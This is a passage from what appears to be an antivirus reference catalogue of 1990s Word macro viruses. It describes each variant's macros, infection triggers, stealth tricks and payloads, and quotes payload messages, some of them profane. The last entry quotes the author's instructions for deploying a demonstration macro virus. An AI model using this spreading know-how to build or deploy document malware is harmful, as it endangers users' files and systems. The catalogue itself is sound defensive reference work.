Colors.A virus is that the "AutoOpen" macro has been replaced
with a new one. This has no effect on the virus. Colors.F is
still able to activate and infect further documents.
[Word.Colors.G]
Virus name: Word.Colors.G
Virus Type: Word macro virus
Number of macros: 9
Encrypted: Yes
Macro names: AutoClose, AutoExec, AutoOpen, FileExit, FileNew
FileSave, FileSaveAs, Macros, ToolsMacro
Size of macros: 7006 Bytes
Place of origin: Unknown
Date of origin: January 1997
Destructive: No
Seen In-The-Wild: No
Description:
Colors.G is a minor variant of the older Colors.B virus.
The only difference between this new variant and Colors.B is
that the "AutoOpen" macro has been replaced with an encrypted
Concept macro. In addition, the "ToolsMacro" macro from
Colors.B is corrupted. Due to the virus code change, Colors.B
does not activate when an infected document is opened.
Colors.F uses "ToolsMacro" to make recognition of an infected
document more difficult (called macro stealth technique).
For more information, please refer to the Colors.A virus description.
[Word.Colors.H]
Virus name: Word.Colors.H
Virus Type: Word macro virus
Number of macros: 9
Encrypted: Yes
Macro names: AutoClose, AutoExec, AutoOpen, FileExit, FileNew,
FileSave, FileSaveAs, Macros, ToolsMacro
Size of macros: 9984 Bytes
Place of origin: Unknown
Date of origin: January 1997
Destructive: No
Seen In-The-Wild: No
Description:
Colors.H is a minor variant based on the older Colors.A virus
and the anti-virus macro solution "WWFix" from Datafellows.
Even though Colors.H has an anti-virus solution in its code, it
is still able to spread and infect further documents.
When an infected document is opened, the new AutoOpen
macro searches the system for the Concept virus. After the
scan it tries to install the protective macros, which are not
present. As a result Colors.H displays the following error
message:
" Document is not open "
Colors.H uses "ToolsMacro" to make recognition of an infected
document more difficult (called macro stealth technique).
For more information, please refer to the Colors.A virus description.
[Word.Colors.I]
Virus name: Word.Colors.I
Virus Type: Word macro virus
Number of macros: 8
Encrypted: Yes
Macro names: AutoExec, AutoOpen, AutoClose, FileExit, FileSave,
FileSaveAs, ToolsMacro, Macros
Size of macros: 6117 Bytes
Place of origin: Unknown
Date of origin: 1997
Destructive: No
Common In-The-Wild: No
Description:
Colors.I is a new variant based on the original Colors.A virus.
The main difference is the "AutoOpen" macro which was
probably snatched from another virus.
This new macro copies the "AutoOpen", "AutoClose" and
"FileSaveAs" macro to the global template instead of calling
the routines in the "macros" macro.
In addition, Colors.I does not have any "FileNew" macro.
Colors.I infects when an infected document is closed
(AutoClose), saved (FileSave and FileSaveAs) and when the
ToolsMacro command is used.
Colors.I uses "ToolsMacro" to make recognition of an infected
file more difficult (called macro stealth technique).
For more information, please refer to the Colors.A virus description.
[Word.Color.J]
Virus name: Word.Colors.J
Virus Type: Word macro virus
Number of macros: 9
Encrypted: Yes
Macro names: AutoClose, AutoExec, AutoOpen, FileExit, FileNew
FileSave, FileSaveAs, Macros, ToolsMacro
Size of macros: 6983 Bytes
Place of origin: Unknown
Date of origin: February 1997
Destructive: No
Seen In-The-Wild: No
Description:
Colors.J is a minor variant based on the older Colors.B virus.
The only difference between the two viruses is one line of
unimportant code.
Colors.J uses "ToolsMacro" to make recognition of an infected
document more difficult (called macro stealth technique).
For more information, please refer to the Colors.B virus description.
[Word.Colors.K]
Virus name: Word.Colors.K
Virus Type: Word macro virus
Number of macros: 9
Encrypted: Yes
Macro names: Macros, FileNew, AutoExec, AutoOpen, FileExit,
FileSave, AutoClose, FileSaveAs, ToolsMacro
Size of macros: 6288 Bytes
Place of origin: Unknown
Date of origin: February 1997
Destructive: No
Common In-The-Wild: No
Description:
Colors.K is a new variant based on the original Colors.A virus.
The only difference between the two viruses is that the
"AutoOpen" macro, with only 3 lines, has been snatched from
another document.
For more information, please refer to the Colors.A virus description.
[Word.Concept.A (a.k.a Prank, WW6Macro, Winword, WBMV)]
Virus name: Word.Concept.A (a.k.a Prank, WW6Macro, Winword, WBMV)
Virus Type: Word macro virus
Number of macros: 4
Encrypted: No
Macro names: AutoOpen, AAAZAO, AAAZFS (FileSaveAs), Payload
Size of macros: 1968 Bytes
Place of origin: USA
Date of origin: July 1995
Destructive: No
Common In-The-Wild: Yes
Description:
Concept was the first macro virus found "In-the-Wild." It was
discovered in July-August 1995 and is now the most common
virus.
Concept activates when an infected document is opened
(AutoOpen). Upon activation, Concept checks for a previous
infection of the global template (normal.dot). If none of the
macros are present, Concept copies its virus macros.
The "AAAZFS" macro is saved under the name "FileSaveAs."
After infecting the global template, Concept makes an entry in
the Win.ini file. It sets "WW6I=1" and displays a window with
a "1" in it.
Concept does not contain any destructive payload, even
though is has a macro with the name "Payload." The "Payload"
macro is empty except for the following text:
" That's enough to prove my point "
[Word.Concept.B]
Virus name: Word.Concept.B
Virus Type: Word macro virus
Number of macros: 4
Encrypted: No
Macro names: AutoOpen, AAAZAO, AAAZFS (FileSaveAs), Payload
Size of macros: 2016 Bytes
Place of origin: France
Date of origin: Spring 1996
Destructive: No
Common In-The-Wild: Yes
Description:
The only difference between Concept.A and Concept.B is that
the virus author translated the "FileSaveAs" macro into its
French equivalent. Therefore this new variant only works with
the French version of Microsoft Word.
[Word.Concept.C]
Virus name: Word.Concept.C
Virus Type: Word macro virus
Number of macros: 4
Encrypted: No
Macro names: AutoOpen, F1, F2, Boom, FileSaveAs
Size of macros: 1834 Bytes in .doc files
1559 Bytes in .dot files
Place of origin: Unknown
Date of origin: Summer 1996
Destructive: No
Common In-The-Wild: No
Description:
The difference between this new variant and the original
Concept virus can be found in the macro names and the
contents of the "Boom" macro. Concept.C activates when an
infected document is opened (AutoOpen).
Further documents become infected when they are saved with
the "FileSaveAs" command.
Concept.C displays a message box with a " 1 " in it.
The "Boom" macro contains another message, yet not
displayed:
" Fight racism; Smash Fascizm "
[Word.Concept.D]
Virus name: Word.Concept.D (a.k.a. Haha)
Virus Type: Word macro virus
Number of macros: 4
Encrypted: 3 of the 4 macros
Macro names: AutoOpen (FileSaveAs), EditSize, FileSort, HaHa
Size of macros: 2129 Bytes in .doc files
2041 Bytes in .dot files
Place of origin: Unknown
Date of origin: Summer 1996
Payload Yes
Common In-The-Wild: No
Description:
Concept.D activates when an infected file is opened
(AutoOpen). Further documents become infected when they
are saved with the FileSaveAs command.
Upon infection of a new document, Concept.D changes the
font color of all the existing text to white, which creates the
impression that all the text disappeared (or was deleted).
Concept.D then adds the following text to the active document:
" i said: say goodbye to all your stuff (look at that hard drive
spin!). "
Upon an attempt to save an infected document, Concept.D
tries to save the document 100 times, causing an irregular
disk activity.
[Word.Concept.E]
Virus name: Word.Concept.E
Virus Type: Word macro virus
Number of macros: 4
Encrypted: No
Macro names: AutoOpen (FileSaveAs), AAAZAO, AAAZFS, Load
Size of macros: 1657 Bytes in .doc files
1472 Bytes in .dot files
Place of origin: Unknown
Date of origin: Summer 1996
Payload Yes
Common In-The-Wild: No
Description:
The difference between this new variant and the original
Concept virus can be found in the names of the macros and the
contents of the "Load" macro.
Concept.E activates when an infected document is opened
(AutoOpen). Further documents become infected when they
are saved with the FileSaveAs command.
Upon infection of a new document, Concept.E displays a
message with a " 1 " in it.
Concept.E also has a virus code that tries to save the active
document in the T:\VIR directory.
[Word.Concept.F (a.k.a. Parasite 1.0, P-Site)]
Virus name: Word.Concept.F (a.k.a. Parasite 1.0, P-Site)
Virus Type: Word macro virus
Number of macros: 7
Encrypted: Yes
Macro names: K, A678, Para, Site, I8U9Y13, Paylaod, AutoOpen
Size of macros: 3673 Bytes in .doc files
3453 Bytes in .dot files
Place of origin: USA
Date of origin: July 1996
Destructive: Yes
Common In-The-Wild: Yes
Description:
Concept.F has various payloads. The first one replaces the
following words in infected documents:
"and" with "not".
The second payload is a little bit more comprehensive.
Concept.F checks the system time for a specific value in the
days section. In case of a 16 (16th of each month), it activates
its payloads. It then replaces the following letters/words in
infected documents:
"." (dot) with "," (comma)
"and" with "not"
"a" with an "e"
This new Concept variant also displays the following window:
" Parasite Virus 1.0 "
" Your computer is infected with the Parasite Virus, Version 1.0! "
[Word.Concept.G (a.k.a. Parasite 0.8, P-Site)]
Virus name: Word.Concept.G (a.k.a. Parasite 0.8, P-Site)
Virus Type: Word macro virus
Number of macros: 7
Encrypted: Yes
Macro names: K, A678, Para, Site, I8U9Y13, Paylaod, AutoOpen
Size of macros: 3670 Bytes in .doc files
3450 Bytes in .dot files
Place of origin: USA
Date of origin: July/August 1996
Destructive: Yes
Common In-The-Wild: No
Description:
According to the Concept.G virus code, this new variant is a
beta release of the Concept.F (version 1.0) virus.
Concept.G has various payloads. The first one replaces the
following words in infected documents:
"and" with "not"
The second payload is a little bit more comprehensive. Concept.G
checks the system time for a specific value in the days section.
In case of a 16 (every 16th of the month) it activates its payloads.
It then replaces the following letters/word in infected documents:
"." (dot) with "," (comma)
"and" with "not"
"a" with an "e"
[Word.Concept.I]
Virus name: Word.Concept.I
Virus Type: Word macro virus
Number of macros: 4 or 5
Encrypted: No
Macro names: AAAEED, AAAUUO, IPayload, DocClose, ToolsSpelling
Size of macros: 2885 Bytes
Place of origin: USA
Date of origin: September 1996
Destructive: No
Common In-The-Wild: No
Description:
Concept.I activates when an infected document is closed
(DocClose).
Further documents become infected in two different ways.
It infects when the user selects the option "Tools/Spelling" or
when an infected document is closed (DocClose).
Depending on the selected infection routine, a new infected
document contains 5 (DocClose infection routine) macros or
only 4 (Tools/Spelling infection routine) macros.
Upon infection of a new document, Concept.I displays a
message with a " 1 " in it.
[Word.Concept.J (a.k.a. Parasite.B)]
Virus name: Word.Concept.J (a.k.a. Parasite.B)
Virus Type: Word macro virus
Number of macros: 7
Encrypted: Yes
Macro names: K, A678, Para, Site, Payload, AutoOpen
Size of macros: 3326 Bytes in .doc files
3042 Bytes in .dot files
Place of origin: USA
Date of origin: Summer 1996
Destructive: Yes
Common In-The-Wild: Yes
Description:
The main difference between this new variant and Concept.G
is that it does not have the "I8U9YB" macro (AutoExit in the
global template).
It also does not replace "." (dot) with "," (comma) on the 16th
of each month.
Concept.J still has some other payloads. It checks the system
time for a specific value in the days section. In case of a 16
(every 16th of the month) it activates its payloads. It then
replaces the following letters/word in infected documents:
"and" with "not"
"e" with an "a" (this used to be "a" with an "e" in Concept.G).
[Word.Concept.K:NL (a.k.a. Pheeew)]
Virus name: Word.Concept.K:NL (a.k.a. Pheeew)
Virus Type: Word macro virus
Number of macros: 4
Encrypted: No
Macro names: AutoOpen, IkWordNietGoed1, IkWordNietGoed2, Lading
Size of macros: 2759 Bytes
Place of origin: Unknown
Date of origin: Unknown
Destructive: Yes
Common In-The-Wild: No
Description:
Concept.K is the first Dutch macro virus.
When an infected document is opened, Concept.K checks for a
previous infection of the global template (normal.dot). It does
this by looking for the two names of the macros "Lading" and
"BestandOpslaanAls". If the global template is not infected,
Concept.K copies its virus macros into the global template.
The macro "IkWordNietGoed2" is saved under the name
"BestandOpslaanAls" ("FileSaveAs").
Further documents become infected when the "FileSaveAs"
command is used. After infection the virus shows various windows
with the following text:
Window 'Important':
" Gotcha ! "
Window 'FINAL WARNING!':
" STOP ALL FRENCH NUCLEAR TESTING IN THE PACIFIC "
If a user clicks the "No" button on the last window, a destructive
payload is activated. All files in the "C:\" and "C:\DOS"
directory are deleted. This leaves the computer unbootable.
[Word.Concept.L (a.k.a. BlastC)]
Virus name: Word.Concept.L (a.k.a. BlastC)
Virus Type: Word macro virus
Number of macros: 7
Encrypted: No
Macro names: Alignment, AutoOpen, BorderSet, FileSaveAs,
AutoClose, ExitRoutine, BlastCDrive
Size of macros: 3744 Bytes
Place of origin: USA
Date of origin: Unknown
Payload: Yes
Common In-The-Wild: No
Description:
Concept.L activates when an infected document is opened
(AutoOpen). Further documents become infected when they
are saved (FileSaveAs).
Concept.L displays 2 messages:
Upon activation:
" Welcome to the 'WINWORD.BLAST_C' macro virus... "
After infection of the global template (Normal.dot):
" Uh Ohhh. NORMAL.DOT just got infected... "
Upon closing the active document on the 24th of each month,
Concept.L will start its destructive payload. It will launch the
File Manager and delete the directory C:\DELETEME.
[Word.Concept.M (a.k.a. New_Horizon)]
Virus name: Word.Concept.M (a.k.a. New_Horizon)
Virus Type: Word macro virus
Number of macros: 5
Encrypted: No
Macro names: Alignment, AutoOpen, BorderSet, FileSaveAs,
AutoClose, ExitRoutine
Size of macros: 2432 Bytes in .doc files
2055 Bytes in global template
Place of origin: USA
Date of origin: Unknown
Destructive: No
Common In-The-Wild: No
Description:
Concept.M activates when an infected document is opened
(AutoOpen). Further documents become infected when they
are saved with the "FileSaveAs" command.
This new Concept variant displays 2 messages:
Upon activation:
" Uh Ohhh. NORMAL.DOT just got infected... "
Upon opening of an infected document:
" Welcome to the Winword.New_Horizons macro virus "
[Word.Concept.N (a.k.a. Concept.hcr)]
Virus name: Word.Concept.N (a.k.a. Concept.hcr)
Virus Type: Word macro virus
Number of macros: 4
Encrypted: Yes
Macro names: FileSaveAs, XAAZAO, XAAZFS, XayLoad
Size of macros: 1968 Bytes
Place of origin: Unknown
Date of origin: November 1996
Destructive: No
Common In-The-Wild: No
Description:
Concept.N is a new variant based on the original Concept.A
virus.
All of its macro names start with the letter "X" (except for
FileSaveAs). Therefore, Concept.N is classified as an intended virus,
since it does not replicate naturally.
[Word.Concept.O:Tw]
Virus name: Word.Concept.O:Tw
Virus Type: Word macro virus
Number of macros: 4
Encrypted: No
Macro names: AutoOpen, Payload, AAAZAO, AAAZFS
Size of macros: 1968 Bytes in documents
Place of origin: Unknown
Date of origin: 1996
Destructive: No
Common In-The-Wild: Yes
Description:
The main difference between this new variant and the original
Concept.A virus is that Concept.O only works with the Chinese
version of Microsoft Word.
Concept.O infects the global template when an infected
document is opened (AutoOpen). Further documents become
infected when they are saved with the "FileSaveAs" command.
For more information, please refer to the Concept.A virus description.
[Word.Concept.Q]
Virus name: Word.Concept.Q
Virus Type: Word macro virus
Number of macros: 4
Encrypted: No
Macro names: AutoOpen, Payload, AAAZAO, AAAZFS
Size of macros: 1959 Bytes in documents
1652 Bytes in global template
Place of origin: Unknown
Date of origin: 1996
Destructive: No
Common In-The-Wild: Yes
Description:
The difference between this new variant and the original
Concept virus is the contents of the "Payload" macro.
Concept.Q does not contain the comment "That's enough to
prove my point."
Concept.Q infects the global template when an infected
document is opened (AutoOpen). Further documents become
infected when they are saved with the "FileSaveAs" command.
For more information, please refer to the Concept.A virus description.
[Word.Concept.R (a.k.a Sutra, Diamond)]
Virus name: Word.Concept.R (a.k.a Sutra, Diamond)
Virus Type: Word macro virus
Number of macros: 4
Encrypted: No
Macro names: AutoOpen (FileSaveAs), CTFISTCCLLESS11, "CTFBORNIN83"
DiamondSutra, FileSaveAs
Size of macros: 4069 Bytes in .doc files
3221 Bytes in global template
Place of origin: Unknown
Date of origin: Unknown
Destructive: No
Seen In-The-Wild: No
Description:
This new variant is based on the original Concept.A virus. Only
a few additions have been made and some macro names were
changed.
When Concept.R infects the global template it displays various
messages:
" SHOSHI-11=TCCL6F200P,in 1983, Japan!!!!! "
" SHOSHIisCTFexactly, inYYY with pwd 901109, BUT less 11years "
" BUT SEEMS & CHAR === EXACT "
" Guy who understand 29 and Prajnaparamita Diamond Sutra "
" governors noble truth within the self self self self self so "
" CTF=TCCL-11 BUT CTF in 1983 "
" CTF's wife is LTC.JAC 24 ; CTF = SUN SUN SUN SUN + 4 CRUELTY "
" You will then tell your friends and your friends will tell "
" others and other .. other other other other other other !!!!! "
" till till till the sun rises in the east which means "
" CTF=TCCLby all sense "
When a document becomes infected, Concept.R adds an
AutoCorrect entry that replaces "teh" with "Shoshi in 1983 is
the Sun." This payload works only with the Windows 95
version of Microsoft Word (Word 7.0).
[Word.Concept.V]
Virus name: Word.Concept.V
Virus Type: Word macro virus
Number of macros: 3
Encrypted: No
Macro names: AutoOpen, MSlothAE, MSlothSA
Size of macros: 1484 Bytes
Place of origin: USA
Date of origin: January 1997
Payload: Yes
Common In-The-Wild: No
Description:
Concept.V is a new variant based on Concept and the Wazzu.H
virus. It includes the payload routine from Wazzu.H, inside the
"AutoExec" macro (MSlothAE in documents), and the
"AutoOpen" ("FileSaveAs" in the global template) from
Concept.
Even though this new variant is based on two different viruses,
it is still able to spread and infect further documents.
For more information, please refer to the Wazzu.H and
Concept.A virus descriptions.
[Word.Concept.Y]
Virus name: Word.Concept.Y
Virus Type: Word macro virus
Number of macros: 4
Encrypted: No
Macro names: AAAZAO, AAAZFS, Payload, AutoOpen
Size of macros: 1992 Bytes
Place of origin: Unknown
Date of origin: 1997
Destructive: No
Common In-The-Wild: No
Description:
Concept.Y is a new variant based on the original Concept.A
virus. The main difference between the two viruses is the
"Payload" macro, which has the following addition to its macro
code:
" (For testing only...) "
For more information, please refer to the Concept.A virus description.
[Word.Concept.Z]
Virus name: Word.Concept.Z
Virus Type: Word macro virus
Number of macros: 4
Encrypted: No
Macro names: AutoOpen, AAAAAB, AAAAAC, AAAAAD
(AAAAAA, FileSave, FileSaveAs, ToolsMacro)
Size of macros: 1774 Bytes
Place of origin: Unknown
Date of origin: 1996
Destructive: No
Common In-The-Wild: Yes
Description:
Concept.Z activates when an infected document is opened
(AutoOpen). Further documents become infected when they
are saved with the "FileSave" and "FileSaveAs" commands.
After infecting the global template, Concept.Z makes an entry
in the WINWORD6.INI file. It sets "WW6I=1."
Concept.Z tries to hide its presence by using "ToolsMacro"
(called macro stealth technique). It does not contain any
destructive payload.
[Word.CountTen.A (a.k.a. SaveCount)]
Virus name: Word.CountTen.A (a.k.a. SaveCount)
Virus Type: Word macro virus
Number of macros: 3
Encrypted: Yes
Macro names: AutoOpen FileSave, FileSaveAs
Size of macros: 956 Bytes
Place of origin: United States
Date of origin: December 1996
Destructive: Yes
Seen In-The-Wild: Yes
Description:
CountTen infects documents when an infected document is
opened and saved via the "FileSave" and FileSaveAs"
commands.
When CountTen infects a file, it sets the variable "SaveCount."
When an infected file is saved, this variable increments. This
technique is used to keep track of the number of times an
infected document has been saved. Upon reaching 10,
CountTen sets the following password:
" What the hell are you doing? "
This password is too long for the Microsoft Word password
box and therefore users can not change the password.
To get access to a password encrypted file, remove the viral
macros and create an "AutoOpen" macro with the following
information in the global template (NORMAL.DOT):
Sub Main
ToolsUnprotectDocument.DocumentPassword="What the hell
are you doing?"
End Sub
[Word.Daniel.A (a.k.a Daniel_1F)]
Virus name: Word.Daniel.A (a.k.a Daniel_1F)
Virus Type: Word macro virus
Number of macros: 2
Encrypted: Yes
Macro names: AutoOpen (Word6Menu), MacroManager
Size of macros: 2718 Bytes
Place of origin: Unknown
Date of origin: September 1996
Destructive: Yes
Common In-The-Wild: No
Description:
Daniel activates when an infected document is opened
(AutoOpen).
By removing the Tools/Macro option, Daniel tries to make
recognition of an infected file more difficult (called macro
stealth technique).
Daniel also redefines the File/Save menu item. Instead of the
original action, it will run the MacroManager.
When a file is opened with a non standard extension (not .doc
or .dot), Daniel will change the document summary info.
Under the keyword "Daniel_Stone" the following comment can
be found:
" All information should be free "
[Word.Dark.A (a.k.a. DarkSide)]
Virus name: Word.Dark.A (a.k.a. DarkSide)
Virus Type: Word macro virus
Number of macros: 4
Encrypted: Yes
Macro names: AutoClose, DarkSide1, HerramMacro, ToolsMacro
Size of macros: 1304 Bytes
Place of origin: Peru
Date of origin: Unknown
Payload: Yes
Seen In-The-Wild: No
Description:
Dark infects the global template (normal.dot) when an infected
document is closed. Further documents become infected when
they are also closed.
Upon infection Dark creates the DARKSIDE.1 file in the
directory of an infected file. The file contains the following
message:
" ATENCION: esta computadora ha sido infectada!. "
" DarkSide1 sin una computadora es como Billy "
" The Kid sin un revolver! ! "
" ... Virus DarkSide1 creado en la ciudad de Lima en enero de 1997 "
" -=] DarkSide1 Is a peruvian virus writer [=- "
To make recognition of an infected document more difficult,
Dark overwrites the Tools/Macro and Herram/Macro options
with its own code (called macro stealth technique).
[Word.Date.A (a.k.a. AntiDMV, Infezione)]
Virus name: Word.Date.A (a.k.a. AntiDMV, Infezione)
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: AutoOpen
Size of macros: 1042 Bytes
Place of origin: USA
Date of origin: 1996
Destructive: Yes
Common In-The-Wild: Yes
Description:
Date infects the global template (normal.dot) once an infected
document in opened. Further documents become infected
when they are opened.
Infection occurs only until June 1, 1996. By the time you
read this document, Date should not be a threat anymore even
though infected documents might still be around.
Date is also known under the name AntiDMV. This name was
chosen because it removes the "AutoClose" macro from
documents. The macro virus "DMV," which has only one
"AutoClose" macro, can therefore be removed with the
Date virus.
[Word.Dedicato.A:It]
Virus name: Word.Dedicato.A:It
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: AutoClose
Size of macros: 742 Bytes
Place of origin: Italy
Date of origin: April 1997
Payload: Yes
Seen In-The-Wild: No
Description:
Dedicato infects the global template when an infected
document is closed. Further documents become infected when
they are also closed (AutoClose).
Dedicato uses language specific commands, therefore it only
works with the Italian version of Microsoft Word.
The following comment can be found in the AutoClose macro:
" REM Questo MacroVirus e' dedicato alla mia ex-ragazza "
" REM Federica, che anche se molti diranno il contrario.. "
" REM io ho amato tanto...e ora mi manca... (Gianlu) "
When Dedicato triggers (8th and 20th of each month), it
displays the following 3 messages:
" ....MacroVirus Federica in esecuzione.... "
" ....Federica Mi Manchi.... "
" Master Boot Sector Damaged "
[Word.Dietzel.A]
Virus name: Word.Dietzel.A
Virus Type: Word macro virus
Number of macros: 5
Encrypted: Yes
Macro names: DATEISchliessen, EXTRASMakro, DATEIDokVorlagen,
DATEISpeichernUnter, DATEIBeenden
Size of macros: 3987 Bytes
Place of origin: Germany
Date of origin: August 1996
Destructive: No
Common In-The-Wild: No
Description:
Activation of Dietzel occurs when an infected document is
closed (DATEISchliessen) or when Microsoft Word is exited
(DATEIBeenden).
Dietzel tries to make recognition of an infected document
more difficult by replacing the Tools/Macro option with a
dialog box very similar to the original one (called macro
stealth technique). It only displays the macros in the global
template, except for the virus macros.
Dietzel's infection routine is very similar to that of traditional
companion viruses. The original document remains untouched,
instead for each saved document Dietzel creates a copy of the
infected global template. This new file is stored in the same
directory but with a .BAK extension. The saved document is then
registered based on this new infected template.
Whenever an infected document is closed the associated
infected template will be loaded as a global template.
[Word.Divina.A (a.k.a. Roberta)]
Virus name: Word.Divina.A (a.k.a. Roberta)
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: AutoClose
Size of macros: 2357 Bytes
Place of origin: Italy
Date of origin: 1996
Destructive: No
Common In-The-Wild: Yes
Description:
Divina infects the global template (normal.dot) when an
infected document is opened and then closed. Further
documents become infected when they are closed via the
"AutoClose" command.
Divina has two payloads. The first payload checks the system
time, and in case of a value of 17 in the minutes field, it will
display a set of windows. Between each displayed box it will
pause and beep.
" ROBERTA TI AMO! "
" Virus 'ROBERTA' is running. Hard Disk damaged. Start antivirus? "
" Exit from system and low level format are recommended. "
" Exit from System? "
After the last message Divina tries to exit Windows.
The second payload is activated on May 21. Divina will again
check the system clock, and if a document is being closed
between the 10th and 20th or between the 40th and 50th minute,
it will display another 2 windows.
" DIVINA IS THE BEST! "
Even though Divina does not contain any destructive payloads,
a scared user might low-level format his/her hard drive.
[Word.Divina.B (a.k.a. Roberta)]
Virus name: Word.Divina.B (a.k.a. Roberta)
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: AutoClose
Size of macros: 1774 Bytes
Place of origin: Italy
Date of origin: 1996
Destructive: No
Common In-The-Wild: No
Description:
The main difference between this new variant and the original
Divina.A virus is that Divina.B does not have the second
payload, which activates on May 21.
Divina.B infects the global template (normal.dot) when an
infected document is opened and then closed. Further
documents become infected when they are closed with the
"AutoClose" command.
Divina.B has one payload that checks the system time, and
in case of a value of 17 in the minutes field, it will display a
set of windows. Between each displayed box it will pause and
beep.
" ROBERTA TI AMO! "
" Hard Disk damaged "
" Exit from system and low level format are recommended. "
" Exit from System? "
After the last message Divina tries to exit Windows.
Even though Divina.B does not contain any destructive
payloads, a scared user might low-level format his/her hard drive.
[Word.Divina.C (a.k.a. Roberta)]
Virus name: Word.Divina.C (a.k.a. Roberta)
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: AutoClose
Size of macros: 3234 Bytes
Place of origin: Italy
Date of origin: 1996
Destructive: No
Common In-The-Wild: No
Description:
Divina.C is a rewritten variant of Divina. It does not contain
the second payload, which activates on May 21.
Divina.C infects the global template (normal.dot) when an
infected document is opened and then closed. Further
documents become infected when they are closed (AutoClose).
Divina.C has one payload that checks the system time, and
in case of a value of 17 in the minutes field, it will display a
set of windows. Between each displayed box it will pause and
beep. After the last message Divina tries to exit Windows.
[Word.Divina.D (a.k.a. Roberta)]
Virus name: Word.Divina.D (a.k.a. Roberta)
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: AutoClose
Size of macros: 3234 Bytes
Place of origin: Italy
Date of origin: 1996
Destructive: No
Common In-The-Wild: Yes
Description:
The main difference between this new variant and Divina.C is
that the code has been slightly modified.
Divina.D infects the global template (normal.dot) when an
infected document is opened and then closed. Further
documents become infected when they are closed (AutoClose).
Divina.D has one payload that checks the system time, and
in case of a value of 17 in the minutes field, it will display a
set of windows. Between each displayed box it will pause and
beep. After the last message Divina.D tries to exit Windows.
[Word.Divina.E (a.k.a. Roberta)]
Virus name: Word.Divina.E (a.k.a. Roberta)
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: AutoClose
Size of macros: 3295 Bytes
Place of origin: Italy
Date of origin: 1996
Destructive: No
Common In-The-Wild: No
Description:
The main difference between this new variant and Divina.C is
that the code has been slightly modified.
Divina.E contains 2 lines made out of "*".
Divina.E infects the global template (normal.dot) when an
infected document is opened and then closed. Further
documents become infected when they are closed (AutoClose).
Divina.E has one payload that checks the system time, and
in case of a value of 17 in the minutes field, it will display a
set of windows. Between each displayed box it will pause and
beep. After the last message Divina.E tries to exit Windows.
[Word.Divina.F (a.k.a. Roberta)]
Virus name: Word.Divina.F (a.k.a. Roberta)
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: AutoClose
Size of macros: 3234 Bytes
Place of origin: Italy
Date of origin: 1997
Destructive: No
Common In-The-Wild: No
Description:
The main difference between this new variant and the previous
Divina viruses is that the code has been slightly modified.
Divina.F infects the global template (normal.dot) when an
infected document is opened and then closed. Further
documents become infected when they are closed (AutoClose).
For more information, please refer to the previous Divina virus
descriptions.
[Word.DMV.A (a.k.a. Demonstration)]
Virus name: Word.DMV.A (a.k.a. Demonstration)
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: AutoClose
Size of macros: 3002 Bytes
Place of origin: USA
Date of origin: Fall 1994
Destructive: No
Common In-The-Wild: No
Description:
DMV was the first macro virus written by Joel McNamara, who
published a detailed paper about macro viruses. It is believed
that DMV invited additional virus authors to write Word macro
viruses. While the paper was not published until Concept was
discovered, it helped virus authors to use new techniques.
Joel McNamara also published an Excel macro virus, which is
nonfunctional (Excel.DMV.A)
DMV infects the global template (normal.dot) when an infected
document is closed. Further documents become infected when
they are also closed.
Upon infection, DMV displays the following messages:
" Counting global macros "
" AutoClose macro virus is already installed in NORMAL.DOT. "
" Infected NORMAL.DOT with a copy of AutoClose macro virus. "
" AutoClose macro virus already present in this document. "
" Saved current document as template. "
" Infected current document with copy of AutoClose macro virus. "
" Macro virus has been spread. Now execute some other code "
" (good, bad, or indifferent). "
[Word.DMV.B (a.k.a. Waverly)]
Virus name: Word.DMV.B (a.k.a. Waverly)
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: AutoClose
Size of macros: 1249 Bytes
Place of origin: Australia
Date of origin: 1006
Payload: Yes
Seen In-The-Wild: No
Description:
DMV.B infects the global template (normal.dot) when an
infected document is closed. Further documents become
infected when they are also closed (AutoClose).
If the second field is higher than 45 and the month is October
or later, DMV.B adds the following text at the end of the active
document:
" We are citizens of Australia. "
" We are youth of Victoria. "
" We are victims of Mount Waverley Secondary College. "
" We tolerated your discipline. "
" We stomached your abuse. "
" We bore your unprofessionalism. "
" We toed the line to protect the bullshit image of YOUR school. "
" We watched our friends be pressured out of your school, "
" just so you could keep your fucking pass rate figures up. "
" And now the world will see, through the spread of this virus
" just how TOTALLY FUCKED UP we are! "
" Parents: yeah- go ahead send your kids to a school where about half
" of us use drugs. You won't see those figures in the glossy brochure."
" This community announcement was proudly sponsored by: "
" M.W.S.C. Year 12 Class Of '96. - in YOUR face. "
[Word.DMV.C]
Virus name: Word.DMV.C
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: AutoClose
Size of macros: 2990 Bytes
Place of origin: Unknown
Date of origin: Unknown
Destructive: No
Seen In-The-Wild: No
Description:
The difference between this new variant and the original
DMV.A virus is that some of the virus codes have been
reformatted and some parts are missing (e-mail address).
DMV.C infects the global template (normal.dot) when an
infected document is closed. Further documents become
infected when they are also closed.
The following messages are displayed when the global
template becomes infected:
" Counting global macros "
" Infected NORMAL.DOT with copy of AutoClose macro virus "
" Macro vir. has been spread. Now execute some other code. "
When a new document becomes infected (global template is
already infected), DMV displays the following message:
" AutoClose macro vir. is already installed in NORMAL.DOT "
" Saved current document as template. "
" Infected current .doc with copy of AutoClose macro vir. "
" Macro vir. has been spread. Now execute some other code. "
The virus code contains the following message at the top of
the code:
" REM This demonstrates an application-specific document virus "
" REM generated by an automatic macro in Microsoft Word for "
" REM Windows 6.0. Code is executed each time a document is closed."
" REM This macro is only a demonstration, and does not perform any "
" REM destructive actions. "
" REM The purpose of this code is to reveal a significant security "
" REM risk in software that supports macro languages with "
" REM auto-loading capabilities. Current virus detection tools are"
" REM not presently capable of detecting this type of virus, and "
" REM most users are blissfully unaware that threats can come from "
" REM documents. "
" REM Paste this code in the macro Window of a Word document "
" REM template. Save the macro as AutoClose. Enter some random "
" REM text in the main word processing window and save the document."
" REM Now copy the file, naming the new file VIRUS.DOC. Open "
" REM VIRUS.DOC in Word. It will appear as a normal document, but "
" REM when you close the document, the virus will execute. "
" REM Message boxes display progress as the code is executed. "
